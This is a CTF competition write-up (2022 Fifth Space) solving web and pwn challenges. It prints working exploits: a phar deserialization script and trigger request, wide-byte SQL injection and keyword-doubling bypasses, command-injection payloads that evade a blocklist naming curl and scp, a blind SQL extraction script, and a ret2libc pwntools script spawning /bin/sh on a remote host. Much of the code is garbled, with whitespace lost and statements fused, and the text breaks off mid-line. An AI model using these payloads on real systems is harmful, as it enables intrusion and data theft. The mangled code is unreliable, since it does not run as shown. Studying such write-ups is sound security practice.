
Title: 2022 Fifth Space Cyber Security Competition WriteUp


1. WEB

1.web_BaliYun

On entry there is a file upload, and only pictures are allowed. Visiting www.zip yields the source code.

1049983-20220922090556835-1442997120.png Website source code — index.php:

<?php
include('class.php');

// Front controller: dispatch on which request field is present.
// Both branches are independent, so a single request may run both.
if (isset($_GET['img_name'])) {
    // check_img's constructor reads $_GET['img_name'] itself (no argument passed).
    $checker = new check_img();
    echo $checker->img_check();
}

if (isset($_FILES['file']['name'])) {
    // upload's constructor reads $_FILES['file'] itself (no argument passed).
    $uploader = new upload();
    echo $uploader->start();
}
?>

class.php:

class upload {
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    /**
     * Captures the uploaded file's name, extension and size from $_FILES.
     *
     * The extension is whatever follows the last dot of the client-supplied
     * name; the size is converted from bytes to KiB. The allow-list holds the
     * four image extensions the application accepts.
     */
    public function __construct() {
        $this->filename = $_FILES['file']['name'];
        $nameParts = explode('.', $_FILES['file']['name']);
        $this->ext = end($nameParts);
        $this->size = $_FILES['file']['size'] / 1024;
        $this->Valid_ext = array('gif', 'jpeg', 'jpg', 'png');
    }

    /**
     * Public entry point: validates and, if accepted, stores the upload.
     *
     * @return string status message from check()
     */
    public function start() {
        return $this->check();
    }

    /**
     * Validation chain: existing name first, then the extension allow-list.
     *
     * NOTE(review): only the extension is checked, never the content, and the
     * file is stored under the client-supplied name (see move()). file_exists()
     * also honours PHP stream wrappers, so the name is handed to the filesystem
     * layer unfiltered. The status strings are kept byte-for-byte as they appear
     * in the listing, where whitespace seems to have been lost in extraction.
     *
     * @return string status message
     */
    private function check() {
        if (file_exists($this->filename)) {
            return 'Imagealreadyexsists';
        }
        if (!in_array($this->ext, $this->Valid_ext)) {
            return 'OnlyImageCanBeUploaded';
        }
        return $this->move();
    }

    /**
     * Moves the temporary upload into upload/ under its original name.
     *
     * @return string success message
     */
    private function move() {
        move_uploaded_file($_FILES['file']['tmp_name'], 'upload/' . $this->filename);
        return 'Uploadsuccsess!';
    }

    /**
     * Runs whenever an instance is unserialized and echoes the file named by
     * $filename.
     *
     * NOTE(review): this is the deserialization gadget the writeup relies on:
     * any unserialize() of this class (including phar metadata) reads and
     * prints an arbitrary path. A hardened version would not perform I/O in
     * a magic method at all.
     */
    public function __wakeup() {
        echo file_get_contents($this->filename);
    }
}

class check_img {
    public $img_name;

    /**
     * Takes the name to check straight from the query string.
     *
     * NOTE(review): $_GET['img_name'] is attacker-controlled and reaches
     * file_exists() unchanged. file_exists() honours stream wrappers such as
     * phar://, which is the trigger the writeup uses. A hardened version would
     * reject wrapper prefixes and confine the path to the upload directory.
     */
    public function __construct() {
        $this->img_name = $_GET['img_name'];
    }

    /**
     * Reports whether the named path exists.
     *
     * @return string one of two literal status messages, kept byte-for-byte
     *                from the listing (whitespace appears lost in extraction)
     */
    public function img_check() {
        $present = file_exists($this->img_name);
        return $present ? 'Imageexsists' : 'Imagennoteexsists';
    }
    // the class's closing brace follows on the next listing line

} It is clearly phar deserialization: upload the archive, then reference it through phar://. The code also shows that the upload directory is upload and that the file name is not changed.

For more information about phar deserialization, please refer to

Detailed explanation of php deserialization expansion attack--phar: https://xz.aliyun.com/t/6699

Phar and Stream Wrapper cause in-depth mining of PHP RCE : https://xz.aliyun.com/t/2958

#test.php

<?php
// Stand-in for the application's upload class: only the property that the
// application's __wakeup() reads needs to exist for the serialized metadata
// to matter.
class upload {
    public $filename;

    public function __construct() {
        $this->filename = 'file:///flag';
    }
}

$archive = new Phar('Tao.phar');
$archive->stopBuffering();
// The stub may begin with arbitrary bytes; the GIF header is used here as in
// the writeup. __HALT_COMPILER() marks where the archive data starts.
$archive->setStub('GIF89a' . '<?php __HALT_COMPILER();');
$archive->addFromString('test.txt', 'test');
// Metadata is stored serialized and is unserialized by PHP when the archive is
// touched via phar:// — the property of the format that makes this work.
$archive->setMetadata(new upload());
$archive->stopBuffering();

# Writing .phar files is refused unless phar.readonly is off for this run.
php -d phar.readonly=0 test.php
# Rename so the extension satisfies the upload allow-list.
mv Tao.phar Tao.gif

In the class there is file_exists(), which can trigger phar:// handling, and a function that can read the flag, so the idea is clear: upload Tao.gif whose content is the upload class with the filename property set to /flag, then pass img_name=phar://upload/Tao.gif to trigger our phar archive.

Upload Tao.gif, then ?img_name=phar://upload/Tao.gif returns the flag.

ouo@GOTA:~$curl-vvhttp://39.107.82.169:27417/index.php?img_name=phar://upload/Tao.gif|grep'flag'

.............

GET/index.php?img_name=phar://upload/Tao.gifHTTP/1.1

Host:39.107.82.169:27417

User-Agent:curl/7.58.0

Accept:*/*

HTTP/1.1200OK

Date:Mon,19Sep202210:42:08GMT

Server:Apache/2.4.25(Debian)

X-Powered-By:PHP/5.6.40

Vary:Accept-Encoding

Content-Length:1925

Content-Type:text/html;charset=UTF-8

.............

flag{s8HJQg5ftEJ9Kcc65Mn55K9XjRRgYVQg}

2.easylogin

SQL injection. When Burp captured the request, GBK-garbled text appeared in it, which pointed to wide-byte injection.

username=admin%df'password=admin

Report an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin�'' at line 1

Testing union injection shows:

1049983-20220922090557623-1116459392.jpg There are always syntax errors. After troubleshooting, it turns out that select and union are replaced with an empty string, so the simplest bypass is to double-write them.

Union-injecting the password directly does not log in. Since normal site development stores the password as MD5, I MD5-hash it. Since quotes cannot be used, I use a hexadecimal literal instead.

1049983-20220922090558263-459598854.jpg

Inject a virtual row and log in directly; the back-end logic is an MD5 comparison. There is a similar original challenge. username=admin%df%27ununion%0aseselectlect%0a66,66,0x3437626365356337346635383966343836376462643537653963613966383038#password=aaa

The challenge hints at a weak password, which brute-forces to admin123

1049983-20220922090558895-1246514747.png

GET/index.php?ip=127.0.0.1%0AlsHTTP/1.1

Host:39.107.75.148:19304

Pragma:no-cache

Cache-Control:no-cache

Upgrade-Insecure-Requests:1

User-Agent:Mozilla/5.0 (WindowsNT10.0; WOW64)AppleWebKit/537.36 (KHTML, likeGecko)Chrome/86.0.4240.198Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer:http://39.107.75.148:19304/index.php?ip=ip

Accept-Encoding:gzip,deflate

Accept-Language:zh-CN,zh;q=0.9

Cookie:PHPSESSID=r4mutkqgni200nfu6ar3qj3jp7;td_cookie=3097567335

Connection:close 1049983-20220922090559527-52671451.jpg

#Read source code

?ip=127.0.0.1%0Apaste%09index.phpArray

(

[0]=?php

[1]=

[2]=header('Content-type:text/html;charset=utf-8');

[3]=

[4]=//Open Session

[5]=

[6]=session_start();

[7]=

[8]=

[9]=

[10]=//First determine whether the cookie remembers the user information

[11]=

[12]=if(isset($_COOKIE['username'])){

[13]=

[14]=#If you remember the user information, it will be directly transmitted to Session

[15]=

[16]=$_SESSION['username']=$_COOKIE['username'];

[17]=

[18]=$_SESSION['islogin']=1;

[19]=

[20]=}

[21]=

[22]=if(isset($_SESSION['islogin'])){

[23]=

[24]=//If you have logged in

[25]=

[26]=

[27]=$res=FALSE;

[28]=

[29]=if(isset($_GET['ip'])$_GET['ip']){

[30]=$ip=$_GET['ip'];

[31]=$m=[];

[32]=if(!preg_match_all('/(\|||;||\/|cat|flag|touch|more|curl|scp|kylin|echo|tmp|var|run|find|grep|-|`|'|:|||less|more)/',$ip,$m)){

[33]=$cmd='ping-c4{$ip}';

[34]=exec($cmd,$res);

[35]=}else{

[36]=$res='Hacker, there is an illegal statement';

[37]=}

[38]=}

[39]=

[40]=

[41]=}else{

[42]=

[43]=//If not logged in

[44]=

[45]=echo'You are not logged in yet, please ahref='login.html'login/a';

[46]=

[47]=}

[48]=

[49]=? The regular-expression filter is as follows:

If(!preg_match_all('/(\|||;||\/|cat|flag|touch|more|curl|scp|kylin|echo|tmp|var|run|find|grep|-|`|'|:|||less|more)/',$ip,$m)) A kylin directory was found in the current directory, and kylin also appears in the filter, so the flag is presumably in that directory. Because / is blocked, the plan is to enter the directory and read the file there; since the challenge also filters kylin, the directory name is matched with a shell wildcard instead (a Linux shell feature).

#Read the kylin directory

?ip=127.0.0.1%0Als%09ky?#Output:

preArray

(

[0]=flag.txt

)

/pre#finalpayload

?ip=127.0.0.1%0Acd%09ky?%0apaste%09fl*#%09=''(tab), in fact ${IFS} can also

?ip=127.0.0.1%0Acd%09ky?%0apaste${IFS}fl*

?ip=127.0.0.1%0Aca''t${IFS}$(fi''nd${IFS}.) 1049983-20220922090600188-1514996600.png 1049983-20220922090600854-1673436991.jpg

4.web_Eeeeasy_SQL

Source code: the comparison is done directly against hexadecimal literals, so a CASE WHEN expression extracts the value one character at a time; BINARY makes the comparison case-sensitive.

1049983-20220922090601456-1710777780.png

Direct note of the script importrequests

# NOTE(review): this listing lost its whitespace and indentation in extraction --
# e.g. "k=0forjinrange(100):" is two statements and "if'msg'notinre.text:" reads
# "if 'msg' not in re.text:". `url` is never defined in what is shown, and
# `sleep` (commented out below) would need an import.
proxy={'http':'127.0.0.1:8080'}

# Extracted value, accumulated as one hex literal, one byte at a time.
result='0x'

# Outer loop bounds the number of characters; inner loop tries printable bytes.
k=0forjinrange(100):

foriinrange(33,126):

k=hex(i)

k=k[2:]

result+=k

# NOTE(review): the comparison operator between `username` and the hex literal
# appears to be missing (presumably stripped as markup); \x09 tabs stand in for
# spaces throughout the expression.
password='or(case\x09when\x09(binary\x09username'+result+')\x09then\x091\x09else\x09223372036854775807+1\x09end)#'

data={'username':'aa\\','password':password}

# Each guess is one request; allow_redirects=False so the login redirect itself
# is observed rather than followed.
re=requests.post(data=data,url=url,proxies=proxy,allow_redirects=False)

#sleep(0.1)

print(re.status_code)

# Oracle: absence of 'msg' in the body means the current byte is one past the
# true value, so the last byte is replaced with hex(i-1) and the inner loop ends.
if'msg'notinre.text:

result=result[:-2]

l=hex(i-1)

l=l[2:]

result+=l

print(result)

break

# Otherwise drop the guessed byte and try the next one (the else-branch
# statement is on the line that follows this listing).
else:

result=result[:-2] Finally, username=Flag_Account password=G1ve_Y0u_@_K3y_70_937_f14g! After logging in, it turns out to be a simple readfile() with a filter: /flag is blocked, so it cannot be used directly, but /proc/self/root/flag bypasses it. ?phpsession_start();if(isset($_SESSION['name'])){if($_SESSION['name']==='Flag_Account'){$file=urldecode($_GET['file']);if(! preg_match('/^\/flag|var|tmp|php|log|\%|sess|etc|usr|\.|\:|base|ssh|http/i',$file)){readfile($file);}else{echo'tryagain~';}}show_source(__FILE__);}else{echo'Login~';}

1049983-20220922090602071-124416845.jpg

1049983-20220922090602648-1448644284.png

2. Pwn

1. H3ll0Rop

Basic ret2libc

frommpwnimport*

# NOTE(review): the import line above, "frommpwnimport*", is "from pwn import *"
# with whitespace lost; pwntools is a third-party package, not stdlib.
context.log_level='debug'#p=process('./H3ll0Rop')

# Remote challenge instance from the page; the commented-out process() call is
# the local variant.
p=remote('47.93.30.67',52705)

elf=ELF('./H3ll0Rop')

# libc bundled with the challenge; the symbol offsets below are read from it.
libc=ELF('./libc-2.23.so')

# Gadget and return addresses are specific to this binary (values from the page).
pop_rdi=0x00000000000400753#vuln=0x400647

vuln=0x4006CC#leaklibc

# Stage 1 (the page's "leaklibc"): 0x60+0x8 bytes of padding, then a chain that
# calls puts on puts@got and returns to vuln so a second payload can be sent.
payload=b'a'*(0x60+0x8)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(vuln)

p.sendlineafter(b'me?',payload)

# Reads up to the 0x7f byte, keeps the last six bytes, zero-extends to a
# little-endian u64 and subtracts puts' offset to get the libc base.
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']

print('libc_base',hex(libc_base))

system=libc_base+libc.sym['system']

binsh=libc_base+next(libc.search(b'/bin/sh'))#getshell

# Stage 2 (the page's "getshell"): same padding, then system("/bin/sh").
payload=b'a'*(0x60+0x8)+p64(pop_rdi)+p64(binsh)+p64(system)+p64(vuln)

p.sendlineafter(b'me?',payload)

# NOTE(review): two statements fused by extraction: p.interactive() then p.close().
p.interactive()p.close()

2.5_1H3ll0Rop

frommpwnimport*

context(os='linux',arch='amd64')

context.log_level=True

e
